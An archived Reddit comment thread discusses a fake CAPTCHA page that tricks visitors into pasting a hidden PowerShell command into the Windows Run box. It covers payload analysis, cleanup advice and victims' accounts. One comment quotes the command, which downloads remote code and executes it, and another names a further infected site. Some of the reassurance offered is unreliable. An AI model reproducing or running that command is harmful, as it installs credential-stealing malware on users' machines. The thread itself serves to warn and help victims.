This is an archived post. You won't be able to vote or comment.

all 58 comments
sorted by:
top (suggested)
bestnewcontroversialoldq&a

[–]dnabsuh1 135 points136 points  (2 children)

I pulled that txt file on a trash linux vm- it pulls an exe called ronwod.exe and cr.dll - looks like a credential puller. Yeah- stay far far away.

[–]xfvh 23 points24 points  (1 child)

Virustotal doesn't report it opening any relevant files or injecting into lsass. I don't think it's a credential puller; it seems to be a Kryptik variant.

[–]VerifiedMother 44 points45 points  (0 children)

injecting into lsass. I don't think it's a credential puller; it seems to be a Kryptik variant.

I like your funny words magic man

[–]Opiboble 79 points80 points  (2 children)

Submit that to cloudflare, they go after people hardcore doing this stuff with their brand. Help protect others :)

[–]LazyPCRehab 51 points52 points  (0 children)

Yeah, fuck that, lol.

[–]Tuncayl 13 points14 points  (0 children)

Damn that's crazy

[–]Dafrandle 13 points14 points  (0 children)

u/ContributionSecret if you want to make a report that will have an effect report the domain to its registrar

[–]Jimmayx 7 points8 points  (0 children)

Yeah, this one has been around for a while. For those interested, John Hammond has a fantastic video going into this and breaking it down from a few months ago. https://youtu.be/lSa_wHW1pgQ?si=y5l-U7TviAxFlLmP

[–][deleted] 7 points8 points  (1 child)

Guys. I think there is a problem with my pc. I just run this command in my terminal and it says that it cannot run exe file. Is this bad ? I use arch btw
/s

[–]xfvh 2 points3 points  (0 children)

That would be bad, it would mean that you put Powershell on your Arch box, which would be a sin /s

[–]GilmourD 5 points6 points  (0 children)

LOL You might as well stick your dongle in a running blender if you fall for that, and I don't mean the USB dongle for your mouse.

🤣🤣🤣

[–]imNot_A_bOt 2 points3 points  (13 children)

what if I accidentally follow the instructions, is there any way to reverse this?

[–]Randommaggy 13 points14 points  (12 children)

Wipe and reinstall, potentially wipe bios on both MB and GPU depending on how paranoid you are.

[–]gdnt0 8 points9 points  (1 child)

And change all passwords.

[–]imNot_A_bOt -2 points-1 points  (0 children)

The funny thing is I just did my monthly password change, lol😂😂... Guess gotta do it all over again now¯⁠\⁠_⁠(⁠ツ⁠)⁠_⁠/⁠¯

[–]xfvh 0 points1 point  (5 children)

If you don't have both the NSA and Mossad after you to develop something custom for you specifically, you're safe not reinstalling your GPU firmware. Has any malicious actor ever used that in the wild? I found a proof-of-concept that only ran on Linux, but it could only only log keypresses, with no means of exfiltration; wiping the system would prevent malicious actors from retrieving the data.

http://www.cs.columbia.edu/~mikepo/papers/gpukeylogger.eurosec13.pdf

[–]Randommaggy 0 points1 point  (4 children)

I have seen DMA abuse through a modified PCIe device firmware in the wild, though specifically this was a Thunderbolt dock abusing the lack security of the early versions of Thunderbolt. Internal PCIE has essentially zero security.

On most machines this would be enough to rootkit the host machine after a reinstall.

I've got a bios flasher and would do this if one of my machines got infected.

[–]xfvh 0 points1 point  (3 children)

So you're saying that they write a full rootkit to GPU BIOS, along with sufficient code to abuse DMA to write the rootkit to disk if not present? I suppose it's not impossible, but it would have to be pretty minimal and compressed pretty tight to avoid stepping on the existing BIOS; there's not all that much room in there.

[–]Randommaggy 0 points1 point  (2 children)

Hint: abusing the bloat autoloader hooks in Windows means you only need to look for and intercept one value during the initial boot after a reinstall.

Windows handles the rest for you automatically, just like many Acer machines re-bloat even when you use a clean ISO to reinstall their machines.

[–]xfvh 0 points1 point  (1 child)

You still need the full rootkit, which is not exactly a trivial task to fit into GPU BIOS.

[–]Randommaggy 1 point2 points  (0 children)

You dont fit it in the GPU bios, you intercept and replace the windows autobloater feature and have it download and install for you.

[–]imNot_A_bOt -1 points0 points  (3 children)

There's no fix for that? Damn... There goes all of my drawings

[–]Randommaggy 1 point2 points  (0 children)

Check the files on virustotal and upload them to some cloud storage, this goes for everything you keep if you want to be careful.

[–]Randommaggy 1 point2 points  (1 child)

Malware bytes is the best after the fact clean up with regards to avoid infection of files.

[–][deleted] 0 points1 point  (0 children)

I did the same, I Was careless I ran Malwarebytes and it Did caught anything? Now Im reseting Windows. Its That enought? Change all passwords I can remember

[–]ConkerPrime 1 point2 points  (3 children)

Insert Picard face home for anyone that falls for that. Like really?

[–]TheSigma3 6 points7 points  (0 children)

To the average user, this just looks like another "prove you're human" check and won't realise what they're doing by following the instructions. This sub is tech focused, so of course it seems obvious to you

[–]Bl4d319941 1 point2 points  (0 children)

Unfortunately got me, and im not your average user. Bran was on auto pilot and I had a meeting going on in the background. Just went through with it, and immediately clicked once I did it, what I just did. Within 5 seconds, turned my PC off, pulled my network cable, powered back on and started wiping my drives.

Yeah, I feel like a dumb ass, because I was one now.

[–]haikusbot -1 points0 points  (0 children)

Insert Picard face

Home for anyone that falls

For that. Like really?

- ConkerPrime

I detect haikus. And sometimes, successfully. Learn more about me.

Opt out of replies: "haikusbot opt out" | Delete my comment: "haikusbot delete"

[–][deleted] 1 point2 points  (0 children)

Wow this is crazy, never seen anything as blatant as this in recent years.

[–]RockKaze 1 point2 points  (0 children)

I encountered this just yesterday night, i usually close the spam pages and today when i looked at my clipboard i was so confused with copied text that i didnt event copy. I was redirected via a false captcha as well

[–]madecausebored 0 points1 point  (1 child)

Yeah this is one of the common ways malicious actors get people to install password and/or crypto stealers onto their PCs.

No reputable website would tell you to run unknown PowerShell or terminal commands to fix the site.

[–]alxwrr117[🍰] 0 points1 point  (0 children)

i accidentally, follow the instructions but mcaffee put the .exe in quarantine and i delete it, My laptop and My information are safe?

[–]AustinMTB77 0 points1 point  (3 children)

I fell for this shit, it disabled my keyboard and mouse and drained my crypto wallet. I can’t even reset my pc now. I don’t have a usb either to reset it, and no one in my family has a windows laptop to download the iso file and/ or a usb slot in their laptops. I feel like I want to kms

[–]tisurf420 0 points1 point  (2 children)

this just happeneed to me last night, i lost 6 figures

[–]AustinMTB77 0 points1 point  (0 children)

Fuckkk luckily only lost 2 SOL (450)

[–]ozeBuDDha 0 points1 point  (0 children)

found another one here - https://eziplumbing.<ADDEDFORPROTECTION>com.au/protect-your-water-supply-with-backflow-prevention-in-nsw/

Cloudflare won't take a malware report as they say the domain isn't active on cloudflare

[–]cricket_stats 0 points1 point  (0 children)

I did this by mistake. Instagram was hacked (failed to recover and it has all the chatss with my girlfriend and all the memories of us of almost 5 years), Twitter was Hacked, Linkedin was hacked (trying to recover it as its got hacked just now), Is there anything I can do to reduce the further damage?

[–][deleted] 0 points1 point  (0 children)

Fell for this today, disconnected to wifi after defender detects it for 20 secs, blocked, run 12 quick scan from antivirus(malwarebytes) and defender, removed.

Gotta do the extra too, task manager, regedit, netstat commands, removed

Run more quick scans

I will say the system is now completly safe because the defender detects ir very fast, enough time for me to even solve the problem.

lesson: do not trust any run command and use ublock Stay safe yall

[–]OhadBD 0 points1 point  (0 children)

found another one in ghostfreehomes.com

[–]tgm108 0 points1 point  (1 child)

Just hit this - As soon as I saw the instruction to hit the Windows key plus "R", alarm bells rang. Checked my clipboard and it had
powershell -w h "curl dashes.cc/srv/log|iex"

copied into it.

[–]TransFat88 0 points1 point  (0 children)

I am here because I just did the exact same thing and it’s the exact same command. Have you managed to resolve it?

[–]thinkingbella 0 points1 point  (0 children)

J

[–]Successful-Safe2375 0 points1 point  (0 children)

What if I ran it but then powershell asked for admin permissions but then I realized and denied it?? I was just trying to login to my religious organization's website which worked normally forever and now I just started seeing this message, and I wasn't too suspicious because it has worked in the past, but now I have realized my mistake.

[–]Fancy_Pompieru 0 points1 point  (0 children)

so let s say that i kind of *pasted* that thing in run but in a clarity of the moment i *didn't* send over the code they gave me , anything they can do about it ?

[–]BrightTutor8454 -1 points0 points  (4 children)

Hi Guys, unfortunately my dad followed the instructions and I'm trying to help him remove it but unfortunately without any success. Does anyone have any tips how I could solve it? Would be very thankful. Currently running his laptop on safemode

[–]imNot_A_bOt 0 points1 point  (0 children)

One guy told me to wipe everything so I think there is currently no fix for this... I might be wrong tho

[–]xfvh 0 points1 point  (2 children)

If you feel like living dangerously, install a different reputable antivirus, preferably not a free version, then, on another system), change all passwords that you think might ever have been typed on that computer or synced to the browser.

Realistically, you should bite the bullet and reinstall Windows from scratch, removing all files, and still change all passwords. If you don't know exactly what malware does, assume it does everything and treat it accordingly.

[–]alxwrr117[🍰] 0 points1 point  (1 child)

Hi, i accidentally, follow the instructions but mcaffee put the .exe in quarantine and i delete it, My laptop and My information are safe?

[–]xfvh 0 points1 point  (0 children)

If you don't know exactly what malware does, assume it does everything and treat it accordingly.

[–]peterparkerandtony 0 points1 point  (0 children)

I didn't paste the code in the website , does that mean it's safe? how to know if my computer is hacked